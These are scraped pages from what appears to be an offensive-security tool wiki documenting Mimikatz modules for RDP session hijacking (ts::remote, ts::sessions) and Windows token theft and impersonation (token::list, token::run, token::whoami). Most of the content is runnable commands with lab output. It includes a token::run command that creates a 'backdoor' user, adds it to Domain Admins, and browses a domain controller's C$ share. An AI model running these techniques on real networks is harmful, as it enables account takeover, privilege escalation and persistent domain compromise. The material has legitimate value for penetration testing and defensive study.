![](https://tools.thehacker.recipes/~gitbook/image?url=https%3A%2F%2F894632015-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MiRT0QHotSpofwDFs_w%252Fuploads%252Fgit-blob-940cffa3791d2035c9d56c37ce5620163bffd867%252F2.png%3Falt%3Dmedia&width=768&dpr=4&quality=100&sign=fc2311bf&sv=2) Cab file [Previoussleep](https://tools.thehacker.recipes/mimikatz/modules/standard/sleep) [Nexttoken](https://tools.thehacker.recipes/mimikatz/modules/token) Last updated 3 years ago --- # remote | The Hacker Tools `ts::remote` can be used to perform RDP takeover/hijacking of active sessions. It has the following arguments: * `/id`: The active RDP session id to hijack. It can be found with [`ts::sessions`](https://tools.thehacker.recipes/mimikatz/modules/ts/sessions) . * `/target`: It connects another session to the target ID, not your own/current session. * `/password`: The password of the target RDP user. It is not required when running as `NT AUTHORITY\SYSTEM`. Copy mimikatz # privilege::debug Privilege '20' OK Copy mimikatz # token::elevate Token Id : 0 User name : SID name : NT AUTHORITY\SYSTEM 640 {0;000003e7} 0 D 35719 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Primary -> Impersonated ! * Process Token : {0;01b55626} 2 F 30415201 hacklab\m3g9tr0n S-1-5-21-2725560159-1428537199-2260736313-1730 (15g,26p) Primary * Thread Token : {0;000003e7} 0 D 30503948 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Impersonation (Delegation) Copy mimikatz # ts::sessions Session: 1 - RDP-Tcp#0 state: Active (0) user : Administrator @ hacklab Conn : 9/25/2021 2:09:14 AM disc : 9/25/2021 2:09:13 AM logon: 9/25/2021 12:35:03 AM last : 9/25/2021 6:45:06 AM curr : 9/25/2021 6:48:11 AM lock : no addr4: 192.168.0.92 Session: *2 - RDP-Tcp#2 state: Active (0) user : m3g9tr0n @ hacklab Conn : 9/25/2021 6:42:13 AM logon: 9/25/2021 6:42:15 AM last : 9/25/2021 6:48:11 AM curr : 9/25/2021 6:48:11 AM lock : no addr4: 192.168.0.92 Copy mimikatz # ts::remote /id:1 Asking to connect from 3 to current session > Connected to 1 Experiments showed the `ts::remote`, even running as `SYSTEM`, was not working against _Windows Server 2019 Standard 1809, OS Build 17763.737_. The password of the user to takeover was requested. _(Demonstration target is a Windows Server 2016 Essentials)_ [Previousmultirdp](https://tools.thehacker.recipes/mimikatz/modules/ts/multirdp) [Nextsessions](https://tools.thehacker.recipes/mimikatz/modules/ts/sessions) Last updated 3 years ago --- # token | The Hacker Tools The Mimikatz Token module enables Mimikatz to interact with Windows authentication tokens, including grabbing and impersonating existing tokens. [Previousversion](https://tools.thehacker.recipes/mimikatz/modules/standard/version) [Nextelevate](https://tools.thehacker.recipes/mimikatz/modules/token/elevate) Last updated 2 years ago --- # sessions | The Hacker Tools `ts::sessions` can be used to list the current RDP sessions. It comes in handy for RDP hijacking. Upon executing `ts::sessions` the following users are identified to be connected over RDP: * `hacklab\m3g9tr0n` (Session: 3 - RDP-Tcp#4) * `hacklab\Administrator` (Session: \*4 - RDP-Tcp#5) Copy mimikatz # ts::sessions Session: 0 - Services state: Disconnected (4) user : @ curr : 9/25/2021 12:41:44 PM lock : no Session: 2 - Console state: Connected (1) user : @ Conn : 9/25/2021 10:45:54 AM curr : 9/25/2021 12:41:44 PM lock : no Session: 3 - RDP-Tcp#4 state: Active (0) user : m3g9tr0n @ hacklab Conn : 9/25/2021 12:39:48 PM disc : 9/25/2021 12:39:48 PM logon: 9/25/2021 11:46:55 AM last : 9/25/2021 12:40:45 PM curr : 9/25/2021 12:41:44 PM lock : no addr4: 192.168.0.92 Session: *4 - RDP-Tcp#5 state: Active (0) user : administrator @ hacklab Conn : 9/25/2021 12:39:49 PM disc : 9/25/2021 12:39:49 PM logon: 9/25/2021 12:32:36 PM last : 9/25/2021 12:41:44 PM curr : 9/25/2021 12:41:44 PM lock : no addr4: 192.168.0.92 Session: 65536 - RDP-Tcp state: Listen (6) user : @ lock : no The asterisk on the `Session: *4 - RDP-Tcp#5`\*\* \*\*indicates the user via whom the `ts::sessions` is executed. Another interesting thing to pay attention is the **lock** field (It can be leveraged for RDP lateral movement). When a user has his/her monitor locked, then the following will be displayed: Copy mimikatz # ts::sessions Session: 3 - RDP-Tcp#4 state: Active (0) user : m3g9tr0n @ hacklab Conn : 9/25/2021 12:39:48 PM disc : 9/25/2021 12:39:48 PM logon: 9/25/2021 11:46:55 AM last : 9/25/2021 1:44:53 PM curr : 9/25/2021 1:44:57 PM lock : yes addr4: 192.168.0.92 _(Demonstration target is a Windows Server 2016 Essentials)_ [Previousremote](https://tools.thehacker.recipes/mimikatz/modules/ts/remote) [Nextvault](https://tools.thehacker.recipes/mimikatz/modules/vault) Last updated 3 years ago --- # run | The Hacker Tools `token::run` executes a new process with its token. It has the following command line arguments: * [`/id`](https://tools.thehacker.recipes/mimikatz/modules/token/run#id) : Token id to use for the new process * [`/user`](https://tools.thehacker.recipes/mimikatz/modules/token/run#user) : Execute the process with the tokens of this user (instead of specifying the token ID).. * [`/process`](https://tools.thehacker.recipes/mimikatz/modules/token/run#process) : The process to run. By default, the command `whoami` is executed. [](https://tools.thehacker.recipes/mimikatz/modules/token/run#preparation) Preparation ------------------------------------------------------------------------------------------- List tokens of user to impersonate using the `token::list` module: Copy mimikatz # token::list /user:ffast Token Id : 0 User name : ffast SID name : 5332 {0;000563b2} 2 F 457263 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary 4432 {0;000563b2} 2 F 2839551 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary 668 {0;00050574} 0 D 329079 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (12g,24p) Impersonation (Impersonation) 668 {0;000563e4} 2 L 353269 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation) 800 {0;000563e4} 2 L 456098 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation) 920 {0;000563e4} 2 L 380750 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation) 920 {0;000563e4} 2 L 387116 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,01p) Impersonation (Identification) 920 {0;000563e4} 2 L 436160 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation) [...] [](https://tools.thehacker.recipes/mimikatz/modules/token/run#id) id ------------------------------------------------------------------------- Run a command using a specified token by it's token ID. By default, the command `whoami` is executed: Copy mimikatz # token::run /id:457263 Token Id : 457263 User name : SID name : 676 {0;000f0ac5} 3 F 457263 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary winattacklab\ffast [](https://tools.thehacker.recipes/mimikatz/modules/token/run#user) user ----------------------------------------------------------------------------- Run a command using a specified token by it's username. The domain name must not be specified. By default, the command `whoami` is executed: Copy mimikatz # token::run /user:ffast Token Id : 457263 User name : SID name : 676 {0;000f0ac5} 3 F 457263 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary winattacklab\ffast [](https://tools.thehacker.recipes/mimikatz/modules/token/run#process) process ----------------------------------------------------------------------------------- Other processes to spawn can be specified. Example to access DC system drive: Copy mimikatz # token::run /id:1075487 /process:"cmd.exe /c dir \\dc1\c$" Token Id : 1075487 User name : SID name : 7156 {0;000f0ac5} 3 F 1075487 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary Volume in drive \\dc1\c$ is Windows Volume Serial Number is 6A6C-0DE3 Directory of \\dc1\c$ 05/31/2023 06:30 AM AzureData 05/31/2023 07:09 AM ddns_server 05/31/2023 07:04 AM inetpub 05/31/2023 06:46 AM Packages 05/05/2023 11:31 AM PerfLogs 05/31/2023 07:04 AM Program Files 05/05/2023 12:26 PM Program Files (x86) 05/31/2023 07:10 AM terraform 05/31/2023 07:06 AM Users 05/31/2023 07:05 AM Windows 05/31/2023 06:33 AM WindowsAzure 05/31/2023 07:07 AM WSUS 0 File(s) 0 bytes 12 Dir(s) 15,918,473,216 bytes free Add backdoor user: Copy mimikatz # token::run /id:1075487 /process:"cmd.exe /c net user backdoor Password.123 /add /domain && net group \"Domain Admins\" backdoor /add /domain && net user backdoor /domain" Token Id : 1075487 User name : SID name : 7156 {0;000f0ac5} 3 F 1075487 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary The request will be processed at a domain controller for domain winattacklab.local. The command completed successfully. The request will be processed at a domain controller for domain winattacklab.local. The command completed successfully. The request will be processed at a domain controller for domain winattacklab.local. User name backdoor Full Name Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 6/20/2023 3:59:27 PM Password expires Never Password changeable 6/20/2023 3:59:27 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon Never Logon hours allowed All Local Group Memberships Global Group memberships *Domain Admins *Domain Users The command completed successfully. It's not possible to directly start a new interactive PowerShell process, because the user input of a new process is somehow not handled correctly. However, when PowerShell is started via PsExec, it can be interactively used: Copy mimikatz # token::run /id:77132228 /process:"C:\tools\PsExec64.exe -accepteula -i powershell.exe" Token Id : 77132228 User name : SID name : 8544 {0;0498f042} 2 L 77132228 child\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (14g,05p) Primary PsExec v2.4 - Execute processes remotely Copyright (C) 2001-2022 Mark Russinovich Sysinternals - www.sysinternals.com A new PowerShell window is then opened wich can be used interactively: Copy PS C:\Windows\system32> whoami winattacklab\ffast S C:\Windows\system32> Enter-PSSession DC1 [DC1]: PS C:\Users\ffast\Documents> hostname DC1 [DC1]: PS C:\Users\ffast\Documents> whoami winattacklab\ffast [DC1]: PS C:\Users\ffast\Documents> ls \ Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 5/31/2023 6:30 AM AzureData d----- 5/31/2023 7:09 AM ddns_server d----- 5/31/2023 7:04 AM inetpub d----- 5/31/2023 6:46 AM Packages d----- 5/5/2023 11:31 AM PerfLogs d-r--- 5/31/2023 7:04 AM Program Files d----- 5/5/2023 12:26 PM Program Files (x86) d----- 5/31/2023 7:10 AM terraform d-r--- 6/22/2023 1:02 PM Users d-r--- 6/20/2023 5:27 PM Windows d----- 5/31/2023 6:33 AM WindowsAzure d----- 5/31/2023 7:07 AM WSUS [](https://tools.thehacker.recipes/mimikatz/modules/token/run#demystifying-the-kull_m_process_run_data-error) Demystifying the `kull_m_process_run_data` Error ------------------------------------------------------------------------------------------------------------------------------------------------------------------- Even as a local administrator, you can get the `kull_m_process_run_data` error: Copy mimikatz # token::run /id:1075487 /process:whoami.exe Token Id : 1075487 User name : SID name : 7156 {0;000f0ac5} 3 F 1075487 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary ERROR kull_m_process_run_data ; CreateProcessAsUser (0x00000522) * The error message says that the `CreateProcessAsUser` function could not be executed. The `token::run` command uses the function `CreateProceasAsUser` to create a new process in the security context of the specified token and requires the following privileges (source: [CreateProcessAsUserA function (processthreadsapi.h)](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessasusera) ): * `SeIncreaseQuotaPrivilege` privilege * `SeAssignPrimaryTokenPrivilege` privilege (if the token is not assignable) A local admin has the permission to get the `SeIncreaseQuotaPrivilege` privilege but not the `SeAssignPrimaryTokenPrivilege` privilege: Copy mimikatz # privilege::name SeIncreaseQuotaPrivilege Privilege '5' OK mimikatz # privilege::name SeAssignPrimaryTokenPrivilege ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (3) c0000061 If you start mimikatz as `SYSTEM`, these privileges can be acquired: Copy mimikatz # privilege::name SeIncreaseQuotaPrivilege Privilege '5' OK mimikatz # privilege::name SeAssignPrimaryTokenPrivilege Privilege '3' OK Then, it's possible to use the `token::run` command and use stolen tokens as primary tokens. [Previousrevert](https://tools.thehacker.recipes/mimikatz/modules/token/revert) [Nextwhoami](https://tools.thehacker.recipes/mimikatz/modules/token/whoami) Last updated 1 year ago --- # list | The Hacker Tools `token::list` lists all tokens on the system. It has the following command line arguments: * [`/id`](https://tools.thehacker.recipes/mimikatz/modules/token/list#id) : The token to list by its ID * [`/user`](https://tools.thehacker.recipes/mimikatz/modules/token/list#user) : The user token to list * [`/system`](https://tools.thehacker.recipes/mimikatz/modules/token/list#system) : List only system tokens * [`/admin`](https://tools.thehacker.recipes/mimikatz/modules/token/list#admin) : List a token of builtin local administrators * [`/domainadmin`](https://tools.thehacker.recipes/mimikatz/modules/token/list#domainadmin) : List tokens with Domain Admin privileges * [`/enterpriseadmin`](https://tools.thehacker.recipes/mimikatz/modules/token/list#enterpriseadmin) : List tokens with Enterprise Admin privileges * [`/localservice`](https://tools.thehacker.recipes/mimikatz/modules/token/list#localservice) : List local service accounts tokens * [`/networkservice`](https://tools.thehacker.recipes/mimikatz/modules/token/list#networkservice) : List network service accounts tokens [](https://tools.thehacker.recipes/mimikatz/modules/token/list#general-usage) General Usage ------------------------------------------------------------------------------------------------ A low-privileged user can list only own tokens: Copy mimikatz # token::list Token Id : 0 User name : SID name : 3844 {0;0008d895} 2 L 588473 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 964 {0;0008d895} 2 L 651175 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 760 {0;0008d895} 2 L 659720 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 1456 {0;0008d895} 2 L 664286 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 5200 {0;0008d895} 2 L 676578 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 6164 {0;0008d895} 2 L 5603039 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,01p) Impersonation (Impersonation) Every line shows one token: Copy 6164 {0;0008d895} 2 L 5603039 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,01p) Impersonation (Impersonation) Displayed information (source: [kuhl\_m\_token.c](https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_token.c#L181) ): * `6164`: Process ID * To which process the token belongs. * Every process has one primary token and can have multiple impersonation tokens. * This ID can be seen in Taskmanager, or Get-Process * `{0;0008d895}`: Logon Session ID (64 bit) * higher 32 bit and lower 32 bit * `2`: Session ID * `L`: Token Elevation Type * `D`: Default * `F`: Full * `L`: Limited * `5603039`: Token ID * `SERVER01\tmassie`: Username * Domain Accounts: `domain\username` * Local Accounts: `hostname\username` or `NT AUTHORITY\USERNAME` * `S-1-5-21-755659916-1915924768-2761631771-1001`: SID * `(15g,01p)`: Groups and privileges * `g`: Number of groups * `p`: Number of privileges * `Impersonation`: Token Type * Unknown * Primary * Impersonation * `(Impersonation)`: Impersonation Level (Only for impersonation tokens) * `Anonymous`: Server cannot impersonate the client * `Identification`: Server can identify client but not impersonate * `Impersonation`: Server can impersonate client’s security context on local system * `Delegation`: Server can impersonate client’s security context on remote systems using cached credentials As a local admin but without the `SeDebugPrivilege` privilege, you can see the tokens of other user's as well but not of system users like `SYSTEM` or `NETWORK SERVICE`: Copy mimikatz # token::list Token Id : 0 User name : SID name : 3844 {0;0008d895} 2 L 588473 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 4376 {0;0008d895} 2 L 601368 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 964 {0;0008d895} 2 L 651175 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 760 {0;0008d895} 2 L 659720 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 3768 {0;0008d7f5} 2 F 661766 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,24p) Primary 1456 {0;0008d895} 2 L 664286 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 5200 {0;0008d895} 2 L 676578 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 7156 {0;000f0ac5} 3 F 1075487 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary 5508 {0;0008d7f5} 2 F 5127728 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,24p) Primary 7224 {0;0008d7f5} 2 F 5870190 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,24p) Primary 6164 {0;0008d895} 2 L 5603039 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,01p) Impersonation (Impersonation) With the `SeDebugPrivilege` privilege enabled, you can see all tokens on the system: Copy mimikatz # privilege::debug Privilege '20' OK mimikatz # token::list Token Id : 0 User name : SID name : [...] 1916 {0;000003e7} 2 D 556559 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary 3844 {0;0008d895} 2 L 588473 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 3428 {0;000003e7} 0 D 593863 NT AUTHORITY\SYSTEM S-1-5-18 (04g,05p) Primary 4376 {0;0008d895} 2 L 601368 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 964 {0;0008d895} 2 L 651175 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 3992 {0;000003e7} 0 D 655073 NT AUTHORITY\SYSTEM S-1-5-18 (04g,11p) Primary 760 {0;0008d895} 2 L 659720 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 3768 {0;0008d7f5} 2 F 661766 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,24p) Primary 1456 {0;0008d895} 2 L 664286 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 5200 {0;0008d895} 2 L 676578 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,02p) Primary 5268 {0;000003e7} 3 D 973825 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary 7156 {0;000f0ac5} 3 F 1075487 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary 4428 {0;000003e7} 0 D 2267524 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary 5508 {0;0008d7f5} 2 F 5127728 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,24p) Primary 7224 {0;0008d7f5} 2 F 5870190 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,24p) Primary 676 {0;000003e7} 0 D 28607 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Impersonation (Impersonation) 676 {0;000003e4} 0 D 555174 NT AUTHORITY\NETWORK SERVICE S-1-5-20 (11g,06p) Impersonation (Impersonation) 676 {0;003e1c50} 0 D 4070487 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (12g,24p) Impersonation (Impersonation) 676 {0;0000756e} 0 D 30076 Font Driver Host\UMFD-0 S-1-5-96-0-0 (09g,02p) Impersonation (Impersonation) 676 {0;000003e7} 0 D 46009 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Impersonation) [...] 2096 {0;000003e5} 0 D 75329 NT AUTHORITY\LOCAL SERVICE S-1-5-19 (16g,03p) Primary 2812 {0;000003e6} 0 D 109047 NT AUTHORITY\ANONYMOUS LOGON S-1-5-7 (01g,00p) Impersonation (Impersonation) 2956 {0;000003e7} 0 D 326793 NT AUTHORITY\SYSTEM S-1-5-18 (12g,07p) Impersonation (Impersonation) 1916 {0;000003e7} 2 D 559210 NT AUTHORITY\SYSTEM S-1-5-18 (04g,10p) Primary 5268 {0;000003e7} 3 D 976221 NT AUTHORITY\SYSTEM S-1-5-18 (04g,10p) Primary [](https://tools.thehacker.recipes/mimikatz/modules/token/list#id) id -------------------------------------------------------------------------- List token with specific token id: Copy mimikatz # token::list /id:27044241 Token Id : 27044241 User name : SID name : 9196 {0;019c935c} 2 F 27044241 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (14g,24p) Primary [](https://tools.thehacker.recipes/mimikatz/modules/token/list#user) user ------------------------------------------------------------------------------ List token of specific user: Copy mimikatz # token::list /user:ffast Token Id : 0 User name : ffast SID name : 5332 {0;000563b2} 2 F 457263 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary 4432 {0;000563b2} 2 F 2839551 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary 668 {0;00050574} 0 D 329079 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (12g,24p) Impersonation (Impersonation) 668 {0;000563e4} 2 L 353269 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation) 800 {0;000563e4} 2 L 456098 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation) 920 {0;000563e4} 2 L 380750 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation) 920 {0;000563e4} 2 L 387116 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,01p) Impersonation (Identification) 920 {0;000563e4} 2 L 436160 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation) 920 {0;000563e4} 2 L 443911 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation) 920 {0;000563e4} 2 L 432114 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation) 920 {0;000563b2} 2 F 460527 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Impersonation (Impersonation) 1816 {0;000563e4} 2 L 424793 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,01p) Impersonation (Impersonation) [](https://tools.thehacker.recipes/mimikatz/modules/token/list#system) system ---------------------------------------------------------------------------------- List tokens of local `SYSTEM` account: Copy mimikatz # token::list /system Token Id : 0 User name : SID name : NT AUTHORITY\SYSTEM 660 {0;000003e7} 1 D 22777 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary 676 {0;000003e7} 0 D 23261 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Primary [...] 2236 {0;000003e7} 0 D 118305 NT AUTHORITY\SYSTEM S-1-5-18 (12g,04p) Impersonation (Identification) 3272 {0;000003e7} 0 D 31384213 NT AUTHORITY\SYSTEM S-1-5-18 (12g,07p) Impersonation (Impersonation) 5568 {0;000003e7} 2 D 594642 NT AUTHORITY\SYSTEM S-1-5-18 (04g,10p) Primary [](https://tools.thehacker.recipes/mimikatz/modules/token/list#admin) admin -------------------------------------------------------------------------------- List tokens of local admins: Copy mimikatz # token::list /admin Token Id : 0 User name : SID name : BUILTIN\Administrators 660 {0;000003e7} 1 D 22777 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary 676 {0;000003e7} 0 D 23261 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Primary 1356 {0;000003e7} 0 D 69077 NT AUTHORITY\SYSTEM S-1-5-18 (04g,07p) Primary 1392 {0;000003e7} 0 D 69588 NT AUTHORITY\SYSTEM S-1-5-18 (04g,07p) Primary 1428 {0;000003e7} 0 D 69888 NT AUTHORITY\SYSTEM S-1-5-18 (04g,04p) Primary [...] [](https://tools.thehacker.recipes/mimikatz/modules/token/list#domainadmin) domainadmin -------------------------------------------------------------------------------------------- List tokens of domain admins: Copy mimikatz # token::list /domainadmin Token Id : 0 User name : SID name : winattacklab\Domain Admins 6260 {0;019c935c} 2 F 30080881 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (14g,24p) Primary 676 {0;019c935c} 2 F 27038624 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (14g,24p) Impersonation (Impersonation) 9196 {0;019c935c} 2 F 27044241 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (14g,24p) Primary [](https://tools.thehacker.recipes/mimikatz/modules/token/list#enterpriseadmin) enterpriseadmin ---------------------------------------------------------------------------------------------------- List tokens of enterprise admins: Copy mimikatz # token::list /enterpriseadmin Token Id : 0 User name : SID name : winattacklab\Domain Admins 6260 {0;019c935c} 2 F 30080881 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (14g,24p) Primary 676 {0;019c935c} 2 F 27038624 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (14g,24p) Impersonation (Impersonation) 9196 {0;019c935c} 2 F 27044241 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (14g,24p) Primary [](https://tools.thehacker.recipes/mimikatz/modules/token/list#localservice) localservice ---------------------------------------------------------------------------------------------- List tokens of local service accounts: Copy mimikatz # token::list /localservice Token Id : 0 User name : SID name : NT AUTHORITY\LOCAL SERVICE 676 {0;000003e5} 0 D 540433 NT AUTHORITY\LOCAL SERVICE S-1-5-19 (17g,02p) Impersonation (Impersonation) 676 {0;000003e5} 0 D 61742 NT AUTHORITY\LOCAL SERVICE S-1-5-19 (17g,11p) Impersonation (Impersonation) [...] 3816 {0;000003e5} 0 D 20547077 NT AUTHORITY\LOCAL SERVICE S-1-5-19 (17g,03p) Primary [](https://tools.thehacker.recipes/mimikatz/modules/token/list#networkservice) networkservice -------------------------------------------------------------------------------------------------- List tokens of network service accounts: Copy mimikatz # token::list /networkservice Token Id : 0 User name : SID name : NT AUTHORITY\NETWORK SERVICE 952 {0;000003e4} 0 D 61753 NT AUTHORITY\NETWORK SERVICE S-1-5-20 (11g,03p) Primary 8 {0;000003e4} 0 D 66030 NT AUTHORITY\NETWORK SERVICE S-1-5-20 (11g,06p) Primary [...] 688 {0;000003e4} 0 D 51362 NT AUTHORITY\NETWORK SERVICE S-1-5-20 (11g,08p) Impersonation (Impersonation) 688 {0;000003e4} 0 D 90007 NT AUTHORITY\NETWORK SERVICE S-1-5-20 (11g,04p) Impersonation (Impersonation) [Previouselevate](https://tools.thehacker.recipes/mimikatz/modules/token/elevate) [Nextrevert](https://tools.thehacker.recipes/mimikatz/modules/token/revert) Last updated 2 years ago --- # whoami | The Hacker Tools `token::whoami` displays the current token. It has the following argument: * `/full`: Display more information about groups and privileges. The argument can actually be anything (e.g.`/bar`). Display current token: Copy mimikatz # token::whoami * Process Token : {0;0030f129} 4 F 38912331 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,24p) Primary * Thread Token : no token * For more information about the output, see `token::list`. * By default, there is no thread token (impersonation token) and only a process token (prmary token). The `/full` parameter can be used to display more information about groups (`G`) and privileges (`P`): Copy mimikatz # token::whoami /full * Process Token : {0;04cfeb5e} 2 F 80775900 client1\tmassie S-1-5-21-1064812226-1257287110-2416274546-1001 (14g,24p) Primary G:[MDE ] client1\None G:[MDE ] Everyone G:[MDE ] NT AUTHORITY\Local account and member of Administrators group G:[MDE ] BUILTIN\Users G:[MDEO ] BUILTIN\Administrators G:[MDE ] BUILTIN\Remote Desktop Users G:[MDE ] NT AUTHORITY\INTERACTIVE G:[MDE ] NT AUTHORITY\Authenticated Users G:[MDE ] NT AUTHORITY\This Organization G:[MDE ] NT AUTHORITY\Local account G:[MDE L ] NT AUTHORITY\LogonSessionId_0_624261 G:[MDE ] LOCAL G:[MDE ] NT AUTHORITY\NTLM Authentication G:[ ] Mandatory Label\High Mandatory Level P:[ ] SeIncreaseQuotaPrivilege P:[ ] SeSecurityPrivilege P:[ ] SeTakeOwnershipPrivilege P:[ ] SeLoadDriverPrivilege P:[ ] SeSystemProfilePrivilege P:[ ] SeSystemtimePrivilege P:[ ] SeProfileSingleProcessPrivilege P:[ ] SeIncreaseBasePriorityPrivilege P:[ ] SeCreatePagefilePrivilege P:[ ] SeBackupPrivilege P:[ ] SeRestorePrivilege P:[ ] SeShutdownPrivilege P:[ ] SeDebugPrivilege P:[ ] SeSystemEnvironmentPrivilege P:[DE ] SeChangeNotifyPrivilege P:[ ] SeRemoteShutdownPrivilege P:[ ] SeUndockPrivilege P:[ ] SeManageVolumePrivilege P:[DE ] SeImpersonatePrivilege P:[DE ] SeCreateGlobalPrivilege P:[ ] SeIncreaseWorkingSetPrivilege P:[ ] SeTimeZonePrivilege P:[ ] SeCreateSymbolicLinkPrivilege P:[ ] SeDelegateSessionUserImpersonatePrivilege * Thread Token : no token Displayed information: * `*`: Token Type * Process Token: Primary Token * Thread Token: Impersonation Token * `G`: Group Information * List of assigned groups to the token (source: [kuhl\_m\_token.c](https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_token.c#L155) ) * `M`: Mandatory * `D`: Enabled by Default * `E`: Group Enabled * `O`: Group Owner * `U`: Group Use for Deny Only * `L`: Group Logon ID * `R`: Group Resource * `P`: Privilege Information * List of privileges for this token (source: [kuhl\_m\_token.c](https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_token.c#L226]) ) * `D`: Privilege Enabled by Default * `E`: Privilege Enabled * `R`: Privilege Removed * `A`: Privilege used for Access [Previousrun](https://tools.thehacker.recipes/mimikatz/modules/token/run) [Nextts](https://tools.thehacker.recipes/mimikatz/modules/ts) Last updated 2 years ago --- # findDelegation.py | The 